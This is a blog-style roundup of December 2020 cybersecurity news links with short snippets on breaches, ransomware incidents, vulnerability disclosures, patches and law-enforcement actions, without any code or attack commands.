OSINT News - December 14, by Bart Otten

by in Security

Trickbot trojan, poor security led to FireEye intrusion: claims

https://www.itwire.com/security/trickbot-trojan,-poor-security-led-to-fireeye-intrusion-claims.html 

iTWire - Trickbot trojan, poor security led to FireEye intrusion: claims

11. Dec 2020 Trickbot trojan, poor security led to FireEye intrusion: claims 11. Dec 2020 US payments processor TSYS hit by Windows Conti ransomware 11. Dec 2020 We're all in the cloud, but how do ...

www.itwire.com

 

---

Unauthorized Access of FireEye Red Team Tools

https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html 

Unauthorized Access of FireEye Red Team Tools | FireEye Inc

Overview. A highly sophisticated state-sponsored adversary stole FireEye Red Team tools. Because we believe that an adversary possesses these tools, and we do not know whether the attacker intends to use the stolen tools themselves or publicly disclose them, FireEye is releasing hundreds of countermeasures with this blog post to enable the broader security community to protect themselves ...

www.fireeye.com

 

---

Taking Action Against Hackers in Bangladesh and Vietnam

https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/ 

Taking Action Against Hackers in Bangladesh and Vietnam - About Facebook

Today, we’re sharing actions we took against two separate groups of hackers — APT32 in Vietnam and a group based in Bangladesh — removing their ability to use their infrastructure to abuse our platform, distribute malware and hack people’s accounts across the internet.

about.fb.com

 

---

Operation StealthyTrident: corporate software under attack

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ 

Operation StealthyTrident: corporate software under attack | WeLiveSecurity

LuckyMouse, TA428, HyperBro, Tmanger and ShadowPad linked in the Mongolian supply-chain attack Operation StealthyTrident.

www.welivesecurity.com

 

---

[PDF] From Zero to Sixty The Story of North Korea’s Rapid Ascent to Becoming a Global Cyber Superpower

https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf 

---

US Cyber Command and Australian IWD to develop shared cyber training range

https://securityaffairs.co/wordpress/111988/cyber-warfare-2/us-cyber-command-iwd-cyber-range.html 

US Cyber Command and Australian IWD to develop shared cyber training range--Security Affairs

US Cyber Command and the Information Warfare Division (IWD) of the Australian Defense Force to develop a virtual cyber training platform.

 

The United States and Australia have signed a first-ever cyber agreement to develop a virtual cyber training platform, the project will be designed by the U.S. Cyber Command (USCYBERCOM) and the Information Warfare Division […]

securityaffairs.co

 

---

OpenSSL is affected by a ‘High Severity’ security flaw, update it now

https://securityaffairs.co/wordpress/112085/security/openssl-tls-ssl-toolkit-flaw.html 

Cyber-450x301.jpgOpenSSL is affected by a ‘High Severity’ security flaw, update it now--Security Affairs

The OpenSSL Project warned of a ‘high-severity’ security vulnerability in the TLS/SSL toolkit that exposes users to denial-of-service (DoS) attacks. The flaw is a null pointer dereference, successful exploitation could trigger denial-of-service conditions ...

securityaffairs.co

 

---

Foxconn electronics giant hit by ransomware, $34 million ransom

https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/ 

Foxconn electronics giant hit by ransomware, $34 million ransom

Foxconn electronics giant suffered a ransomware attack at a Mexican facility over the Thanksgiving weekend, where attackers stole unencrypted files before encrypting devices. Foxconn is the ...

www.bleepingcomputer.com

 

---

LockBit Ransomware operators hit Swiss helicopter maker Kopter

https://securityaffairs.co/wordpress/111998/cyber-crime/lockbit-ransomware-kopter.html 

LockBit Ransomware operators hit Swiss helicopter maker Kopter--Security Affairs

LockBit ransomware operators have compromised the systems at the helicopter maker Kopter and published them on their darkweb leak site.

 

The helicopter maker Kopter was hit by LockBit ransomware, the attackers compromised its internal network and encrypted the company’s files. Kopter Group is Switzerland-based company that was founded in 2007 that was acquired by Leonardo in April […]

securityaffairs.co

 

---

Attack on Vermont Medical Center is costing the hospital $1.5M a day

https://securityaffairs.co/wordpress/112133/hacking/vermont-medical-center-cyberattack.html 

Attack on Vermont Medical Center is costing the hospital $1.5M a day--Security Affairs

The attack that hit the University of Vermont Medical Center at the end of October is costing the hospital about $1.5 million a day.

 

In October, ransomware operators hit the Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network. The ransomware attack took place on October 28 and disrupted services at the UVM Medical Center […]

securityaffairs.co

 

---

More than 20 million Gionee phones secretly implanted with Trojan Horses to make money

https://www.gizmochina.com/2020/12/05/more-than-20-million-gionee-phones-secretly-implanted-with-trojan-horses-to-make-money/ 

More than 20 million Gionee phones secretly implanted with Trojan Horses to make money - Gizmochina

Recently, the China Judgment Document Network published a verdict on the illegal control of computer information systems found to have been executed on Gionee phones. According to the court ...

www.gizmochina.com

 

---

Expert published PoC exploit code for Kerberos Bronze Bit attack

https://securityaffairs.co/wordpress/112156/hacking/kerberos-bronze-bit-attack.html 

Expert published PoC exploit code for Kerberos Bronze Bit attack--Security Affairs

The proof-of-concept exploit code for the Kerberos Bronze Bit attack was published online, it allows intruders to bypass authentication and access sensitive network services

 

The proof-of-concept exploit code for the Kerberos Bronze Bit attack, tracked as CVE-2020-17049, was published online this week. The hacking technique could be exploited by attackers to bypass the Kerberos authentication […]

securityaffairs.co

 

---

Finnish customs take down sipulimarket on the dark web with Europol support

https://www.europol.europa.eu/newsroom/news/finnish-customs-take-down-sipulimarket-dark-web-europol-support 

Finnish Customs take down Sipulimarket on the dark web with Europol support | Europol

Today the Finnish Customs (Tulli) have shut down the Sipulimarket dark web marketplace and seized all its content. This latest hit against the dark web was done in close cooperation with the Polish Provincial Police Headquarters in Wroclaw (Komenda Wojewódzka Policji we Wroclawiu) and Europol’s European Cybercrime Centre (EC3) and Eurojust.

www.europol.europa.eu

 

---

Alert (AA20-345A) Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data

https://us-cert.cisa.gov/ncas/alerts/aa20-345a 

Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data | CISA

This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).

us-cert.cisa.gov

 

---

Cyberattack on the European Medicines Agency

https://www.ema.europa.eu/en/news/cyberattack-european-medicines-agency 

Cyberattack on the European Medicines Agency | European Medicines Agency - ema.europa.eu

European Medicines Agency Domenico Scarlattilaan 6 1083 HS Amsterdam The Netherlands. Tel: 31 (0)88 781 6000. For delivery address, see: How to find us

www.ema.europa.eu

 

---

"Important, Spoofing" - zero-click, wormable, cross-platform remote code execution in Microsoft Teams

https://github.com/oskarsve/ms-teams-rce 

GitHub - oskarsve/ms-teams-rce

Below is the original bug report sent to MSRC Summary. A Remote Code Execution vulnerability has been identified in MS Teams desktop which can be triggered by a novel XSS (Cross-Site Scripting) injection in teams.microsoft.com.

github.com

 

---

Crooks hide software skimmer inside CSS files

https://securityaffairs.co/wordpress/112117/malware/skimmer-inside-css-files.html 

hackers hide the software skimmer inside CSS files--Security Affairs

The code used by the attackers is a common keystroke logger, since the company disclosed its discovery the code has been taken offline. “We found a handful of victim stores with this injection method,” SanSec founder Willem de Groot told ZDNet. “However, the infrastructure has been in place since September and was previously used for several dozen more traditional attacks.

securityaffairs.co

 

---

Interview with Massimiliano Brolli, Head of TIM Red Team Research

https://securityaffairs.co/wordpress/112190/security/massimiliano-brolli-tim-read-team-interview.html 

Interview with Massimiliano Brolli, Head of TIM Red Team Research--Security Affairs

Interview with Massimiliano Brolli, Head of TIM Red Team Research, which is a team of experts that focus on zero-day hunting. For some time now we have been witnessing a series of undocumented vulnerabilities issued by a TIM IT Security laboratory called Red Team Research RTR, which already has 31 new CVEs to date in about a year.

securityaffairs.co

 

---

njRAT RAT operators leverage Pastebin C2 tunnels to avoid detection

https://securityaffairs.co/wordpress/112147/cyber-crime/njrat-rat-pastebin-c2.html 

njRAT RAT operators leverage Pastebin C2 tunnels to avoid detection--Security Affairs

Threat actors behind the njRAT Remote Access Trojan (RAT) are leveraging active Pastebin Command and Control Tunnels to avoid detection.

 

Researchers from Palo Alto Networks’ Unit 42 reported that operators behind the njRAT Remote Access Trojan (RAT), aka Bladabindi, are leveraging Pastebin Command and Control tunnels to avoid detection. “In observations collected since October 2020, […]

securityaffairs.co

 

---

Watchcom discovers new Cisco Jabber vulnerabilities

https://watchcom.no/nyheter/nyhetsarkiv/cisco-jabber-vulnerabilities-resurface/ 

Cisco Jabber vulnerabilities resurface

 

watchcom.no

 

---

Unauthenticated Command Injection bug opens D-Link VPN routers to hack

https://securityaffairs.co/wordpress/112077/hacking/d-link-vpn-routers-flaws.html 

Unauthenticated Command Injection bug opens D-Link routers to hack--Security Affairs

An unauthenticated command injection vulnerability could be exploited by threat actors to compromise D-Link VPN routers.

 

Security researchers at Digital Defense discovered three vulnerabilities in D-Link VPN routers, including command injection flaws, and an authenticated crontab injection flaw. The experts initially discovered the flaws in DSR-250 router family running firmware version 3.17 ...

securityaffairs.co

 

---

Critical remote code execution fixed in PlayStation Now

https://securityaffairs.co/wordpress/112049/hacking/playstation-now-rce.html 

Critical remote code execution fixed in PlayStation Now--Security Affairs

The bugs affected PS Now version 11.0.2 and earlier on systems running Windows 7 SP1 or later. Since the launch in 2014, PlayStation Now reached more than 2.2 million subscribers [PDF] at the end of April 2020. Hakimian reported the bugs to Sony on May 13, 2020, through PlayStation’s official bug bounty program operated via bug bounty platform HackerOne.

securityaffairs.co

 

---

QNAP fixed eight flaws that could allow NAS devices takeover

https://securityaffairs.co/wordpress/112041/security/qnap-nas-flaws.html 

QNAP fixed eight flaws that could allow NAS devices takeover--Security Affairs

The list of vulnerabilities addressed by QNAP is available here, it includes XSS and command injection issues. The flaws fixed by the vendor are rated as medium and high severity security. The high-severity vulnerabilities tracked as CVE-2020-2495, CVE-2020-2496, CVE-2020-2497, and CVE-2020-2498 are cross-side-scripting flaws that could allow remote attackers to inject malicious code in File ...

securityaffairs.co

 

---

Cisco fixes exploitable RCEs in Cisco Security Manager

https://securityaffairs.co/wordpress/112023/security/cisco-security-manager-flaws.html 

Cisco fixes exploitable RCEs in Cisco Security Manager--Security Affairs

These flaws impact CSM releases 4.22 and earlier. The IT firm addressed two of the 12 vulnerabilities, tracked as CVE-2020-27125 and CVE-2020-27130. “A vulnerability in Cisco Security Manager could allow an unauthenticated, remote attacker to access sensitive information on an affected system.” reads the description for CVE-2020-27125. “The vulnerability is due to insufficient protection ...

securityaffairs.co

 

---

Samsung fixes critical Android bugs in December 2020 updates

https://www.bleepingcomputer.com/news/security/samsung-fixes-critical-android-bugs-in-december-2020-updates/ 

Samsung fixes critical Android bugs in December 2020 updates

This week Samsung has started rolling out Android's December security updates to mobile devices to patch critical security vulnerabilities in the operating system. This comes after Android had ...

www.bleepingcomputer.com

 

---

Russian Alexander Vinnik sentenced in Paris to five years in prison for money laundering

https://securityaffairs.co/wordpress/112074/cyber-crime/alexander-vinnik-sentence-france.html 

Russian Alexander Vinnik sentenced in Paris to five years in prison--Security Affairs

The man went on trial in Paris for having defrauded nearly 200 victims across the world of 135M euros using ransomware. Alexander Vinnik allegedly headed the Bitcoin exchange BTC-e, he is charged with different hacking crimes in Russia, France, and the United States. The French court acquitted Vinnik of charges of extortion and association with a cybercrime organization.

securityaffairs.co

 

---

Individual Pleads Guilty to Participating in Internet-of-Things Cyberattack in 2016

https://www.justice.gov/opa/pr/individual-pleads-guilty-participating-internet-things-cyberattack-2016 

Individual Pleads Guilty to Participating in Internet-of-Things Cyberattack in 2016 | OPA | Department of Justice

An individual, formerly a juvenile, pleaded guilty to committing acts of federal juvenile delinquency in relation to a cyberattack that caused massive disruption to the Internet in October 2016.

www.justice.gov

 

 

 

Anonymous